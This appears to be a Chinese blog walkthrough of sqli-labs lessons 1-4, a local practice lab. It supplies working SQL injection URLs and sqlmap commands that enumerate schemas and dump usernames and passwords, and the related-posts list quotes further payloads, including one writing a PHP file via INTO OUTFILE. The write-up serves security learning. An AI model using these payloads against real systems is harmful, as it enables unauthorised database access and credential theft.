Sqli-labs Less 1-4

最新推荐文章于 2024-11-04 10:13:26 发布
最新推荐文章于 2024-11-04 10:13:26 发布
阅读量94 收藏
点赞数
文章标签: 数据库 python
原文链接:https://yq.aliyun.com/articles/649056
版权

 

刚刚做完sqli-labs的第一节的第一题(QAQ)

我的时间呀!!!(太笨只能一步一步的往前走)

我使用了两种方法解决的这一题,希望能够帮助到你们

 

题目是 :GET Error based- Single quotes -String

解题链接:http://127.0.0.1/sqli-labs-master/Less-1/

关注点:基于错误,单引号,字符型注入。

手工注入:

payload1:http://127.0.0.1/sqli-labs-master/Less-1/?id=0

页面正常:

payload2:http://127.0.0.1/sqli-labs-master/Less-1/?id=0'

页面返回错误(可以判断有字符型的注入)

使用UNION SELECT 或者 ORDER BY 语句进行查询字段数:

payload3:http://127.0.0.1/sqli-labs-master/Less-1/?id=0' UNION SELECT 1,2,3 --+

可以发现字段数为 3 ,可显示位置为 2,3。尾部—+会被浏览器解释为— (空格),这在mysql里是注释。

然后就可以查询数据库的名称

payload4:http://127.0.0.1/sqli-labs-master/Less-1/?id=0' union select 1,group_concat(schema_name),3 from information_schema.schemata --+

 

 

这里是利用元数据表INFORMATION_SCHEMA获取数据库信息。

获取表名:

payload5:http://127.0.0.1/sqli-labs-master/Less-1/?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479 --+

这里 hex(security)=0x7365637572697479(进行十六进制的转换)

 

 

 

 获取字段名:

payload6:http://127.0.0.1/sqli-labs-master/Less-1/?id=0%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=0x7573657273--+

 

最后就是进行数据的查询:

payload7:http://127.0.0.1/sqli-labs-master/Less-1/?id=0%27%20union%20select%201,group_concat(username,0x3a,password,0x20),3%20from%20security.users%20--+

 

 

 

 

sqlmap工具注入:

 

首先进行数据的查询:

payload1:python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=0" --technique UE --dbms mysql --dbs --batch

 

 数据库中的表的查询:

payload2:python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=0" --technique UE --dbms mysql -D security --tables --batch

字段信息的查询:

payload3:python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=0" --technique UE --dbms mysql -D security -T users --columns --batch

最后就会得到具体的答案了:

payload4;python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=0" --technique UE --dbms mysql -D security -T users -C username,password --dump --batch

 

 

 

第二题:http://127.0.0.1/sqli-labs-master/Less-2/

由于题目说是数值型注入。 所以不需要闭合引号。

其它的过程和第一题一样的:

直接给出最后的payload:http://127.0.0.1/sqli-labs-master/Less-2/?id=0%20UNION%20SELECT%201,GROUP_CONCAT(username,0x3a,password,0x20),3%20FROM%20security.users%20--+

 

 使用sqlmap注入:python sqlmap.py -u "127.0.0.1/sqli-labs-master/Less-2/?id=0 " --technique UE --dbms mysql -D security -T users -C username,password --dump --batch

 

 

第三题:http://127.0.0.1/sqli-labs-master/Less-3/

首先:进行一下手工注入:

payload:http://127.0.0.1/sqli-labs-master/Less-3/?id=1%27

 

注意到报错回显中有 ),说明需要闭合。

我们只是需要把第一题中的每一个(0‘——>0'))就好了

手工注入:

payload:127.0.0.1/sqli-labs-master/Less-3/?id=0') UNION SELECT 1,GROUP_CONCAT(username,0x3a,password,0x20),3 FROM security.users --+

 

 sqlmap注入:python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-3/?id=1=0')" --technique UE --dbms mysql -D security -T users -C password,username --dump --batch

 

 DI

 

 

 第四题:http://127.0.0.1/sqli-labs-master/Less-4/

首先:进行手工注入:http://127.0.0.1/sqli-labs-master/Less-4/?id=1"

ennnnnnnn......................

我们只是需要把双引号后面加上一个)就可以了

接下来手工注入的方式和以上相同

payload:http://127.0.0.1/sqli-labs-master/Less-4/?id=-1")  union select 1,group_concat(char(32),username,char(23)),group_concat(char(32),password,char(32)) from users--+

 

 使用sqlmap注入:

我直接写出最后要运行的:python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-4/?id=-1")" --technique UE --dbms mysql -D security -T users -C password,username --dump --batch

 

 

您可以考虑给博主来个小小的打赏以资鼓励,您的肯定将是我最大的动力。

微信 支付宝
作者: 落花四月
关于作者:潜心于网络安全学习。如有问题或建议,请多多赐教!
版权声明:本文版权归作者和博客园共有,欢迎转载,但未经作者同意必须保留此段声明,且在文章页面明显位置给出原文连接.
特此声明:所有评论和私信都会在第一时间回复。也欢迎园子的大大们指正错误,共同进步。或者直接私信我
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角【推荐】一下。您的鼓励是作者坚持原创和持续写作的最大动力!
weixin_33890499
关注
sqli-labs学习(less-1-less-4)
weixin_30908649的博客
11-25 199
学习sqli-labs之前先介绍一些函数,以便于下面的payload看的懂 group_concat函数 将查询出来的多个结果连接成一个字符串结果,用于在一个回显显示多个结果 同理的还有 concat_ws() limit star,size用法 start:从第几条记录开始。 size:读取几条记录。 sqli-lab-1 关键代码 $sql="SELE...
sqli-labs—————Less-4
Fly_鹏程万里
05-08 689
Less4根据要求传入参数id,数据类型numeric添加单引号、and 1=1  、and 1=2进行测试感觉是不是非常奇怪,为什么都是正确显示页面呢?我们不妨再试试双引号注入代码之后,我们得到了下面这个错误You have an error in your SQL syntax; check the manual that corresponds to your MySQL server ve...
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 16万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
Sqli-labs less-17
weixin_46099552的博客
08-15 370
会报错,所以应该使用报错注入(图放错了)在burp抓包后放进重放器然后直接粘贴就行。语句就知道应该是在密码上注入,输入。看对话框是新建用户,是。可以使用子查询来绕过。
Sqli-labs Less7
beiweixiaotian66的博客
07-23 486
一丢丢小练习
sqli-labs less-26 空格绕过
wanggonghanfei的博客
10-13 935
sqli-labs less-26 空格绕过
Sqli-labs Less8-Less16
beiweixiaotian66的博客
07-23 742
一丢丢小练习
sqli-labs-master less1-less6
bunengyongzho666的博客
08-02 1240
id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+id=0的') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+?
Sqli-labs less-01
weixin_47075747的博客
12-12 596
Sqli-labs less-01 mysql 基本用法 查库:select schema_name from information_schema.schemata; 查表:select table_name from information_schema.tables where table_schema='security';
Sqli-labs Less8
orchid_sea的博客
10-16 1100
1.判断注入点 2.判断字段数 3.爆破数据库 4.爆破表 5.爆破列 6.爆破数据
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs靶场练习笔记
11-09
- **示例**:`http://127.0.0.1/sqli-labs-master/less-7/?id=-1')) union select 1,2,'($_POST["lcy"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的...
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 2003
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
oceanbase V4.2.2社区版集群离线部署
king_harry的专栏
11-01 723
版本,选择是上传文件,包含oceanbase-ce、oceanbase-ce-libs、oceanbase-ce-utils。关闭时展示,为 OBProxy 集群的访问地址,仅用于生成租户的连接串,不影响实际使用,需要自主配置负载均衡,如果是 VIP 地址,还需要您自主申请并绑定到 OBProxy Server。集群配置选项卡—更多配置—更改系统内存保留选项,默认是30G,如果测试机内存只有16G,则需要调小,本测试调整为2G,这样ocp-server安装不会失败。自定义待管理的集群的名称。
安利一款开源企业级的报表系统SpringReport
最新发布
luck332的专栏
11-04 322
SpringReport是一款企业级的报表系统,支持在线设计报表,并绑定动态数据源,无需写代码即可快速生成想要的报表,可以支持excel报表和word报表两种格式,同时还可以支持excel多人协同编辑,后续考虑实现大屏设计器功能,通过简单的设计器可以生成炫酷的大屏效果。
JAVA 插入 JSON 对象到 PostgreSQL
qq_52143611的博客
10-30 933
在现代软件开发中,由于 JSON 数据的轻量和通用性,处理 JSON 数据已经变得无处不在。PostgreSQL凭借其对 JSON 的强大支持,为存储和查询 JSON 数据提供了出色的平台。为了将JSON数据保存到PostgreSQL数据库中,我们可以将JSON数据转换为PostgreSQL的JSONB类型数据,然后将其存储在数据库中。在Java中,我们可以使用JDBC或者基于ORM框架的方式来实现这一功能。
【重学 MySQL】七十九、深入探索用户变量
CSDN全栈领域优秀博主,阿里云博客专家,工信部权威认证物联网技术开发工程师,曾30分钟高分通过C语言二级,两天手撸代码完成EasyX飞机大战,靠接软件私活一个月换苹果电脑
10-30 905
定义:用户变量以“@”符号开头,后面跟着变量名。变量名可以是任何随机的、复合的标量表达式,只要其中没有列指定。赋值可以使用SET语句来定义和赋值用户变量,如。也可以使用SELECT语句来为用户变量赋值,但必须使用“:=”赋值运算符,因为在SELECT语句中,MySQL将“=”运算符视为等于运算符。例如,。作用域:会话用户变量的作用域是当前会话,而局部变量的作用域是其定义的BEGIN/END语句块。命名:会话用户变量以“@”符号开头,而局部变量不需要。使用场景。
真·香!深度体验 zCloud 数据库云管平台 -- DBA日常管理篇
weixin_54551388的博客
11-01 696
点击蓝字 关注我们zCloud 作为一款业界领先的数据库云管平台,通过云化自治的部署能力、智能巡检和诊断能力、知识即代码的沉淀能力,为DBA的日常管理工作带来了革新式的简化与优化。经过一周的深度体验,今天笔者与您深入探讨 zCloud 在数据库用户、参数以及日志管理方面的具体应用,看它如何为DBA的日常管理工作带来价值。数据库用户管理“常在河边走哪有不湿鞋”,作为DBA或多或少都曾遇到过因权限配置...
SpringSession源码分析
lkr_lkr的博客
11-01 283
默认对常规Session的理解和使用,如何使用Set-Cookie。
sqli-labs less-1
08-07
"Less-1"是SQL注入实验室(sqli-labs.com)中的一个挑战任务,它是针对Web应用程序安全训练的一种常见练习,特别是针对SQL注入攻击的学习。在这个特定的实验中,用户通常需要通过提交恶意SQL查询来绕过网站的安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值